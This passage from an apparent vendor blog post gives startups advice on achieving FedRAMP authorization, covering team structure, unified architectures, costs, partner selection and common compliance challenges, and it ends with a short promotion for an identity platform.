• Application security engineers who can embed guardrails without bottlenecking delivery
• DevSecOps teams to operationalize security across pipelines
• Platform engineers responsible for both cloud posture and deployment parity

Cross-functional collaboration isn’t a nice-to-have—it’s how you survive the inevitable curveballs.

3. Mirror Your Commercial and Federal Architectures

Attempting to run a separate product for the federal market? Don’t.

Winning startups keep a single software release chain, with identical configurations and infrastructure across both environments. That means:

• No federal-only forks
• No custom hardening outside the mainline
• One platform, one set of controls

This approach dramatically reduces technical drift, simplifies audits, and ensures your engineers aren’t context-switching between two worlds.

Scrutinize the Business Case

FedRAMP isn’t cheap. Initial investments often exceed $1 million, and timelines can stretch beyond 12 months. Before you start:

• Validate the market opportunity—can you actually win federal deals?
• Confirm executive sponsorship—FedRAMP requires top-down alignment
• Look for 10x return potential—not just for the cost, but for the time and energy involved

This isn’t a growth experiment. It’s a long play that demands conviction.

Pick the Right Partners

Navigating FedRAMP alone is a losing strategy. Choose external vendors carefully:

• Ask for customer references with successful FedRAMP delivery
• Watch for predatory pricing—especially from Third Party Assessment Organizations and automation tools
• Prioritize collaboration and transparency—your partner becomes an extension of your team

Cut corners here and you’ll pay for it later—in both delays and trust.

Build Internal Muscle

No external vendor can replace internal readiness. You’ll need:

• Security architecture skills with depth in cryptography, PKI, and TPMs
• Ops maturity to manage change control, evidence collection, and ticketing rigor
• Strong program management to coordinate vendors, auditors, and internal stakeholders
• Team training—FedRAMP has a steep learning curve. Invest early.

FedRAMP reshapes how you ship, with slower velocity, higher overhead, and the need for tight cross-functional alignment. While the impact is real, the long-term payoff is disciplined security and process maturity that goes well beyond compliance.

The Toughest Challenges

Every FedRAMP journey hits turbulence. Some of the hardest problems include:

• Interpreting FedRAMP Moderate controls without clear guidance
• Defining authorization boundaries across microservices and shared components
• Operationalizing DevSecOps gates that enforce security without stalling builds
• Choosing the right tools for SAST, DAST, SBOM, and SCA—and integrating them

Don’t underestimate these. They can become critical blockers without careful planning.

Achieving FedRAMP at startup speed is possible—but only with ruthless prioritization, integrated security culture, and a deep understanding of what you’re signing up for.

If you’re considering the journey: start small, move deliberately, and commit fully. The federal market rewards trust—but only for those who earn it.

Beyond Identity is a FedRAMP-moderate identity and access management platform that eliminates identity-based attacks. Learn more at beyondidentity.com.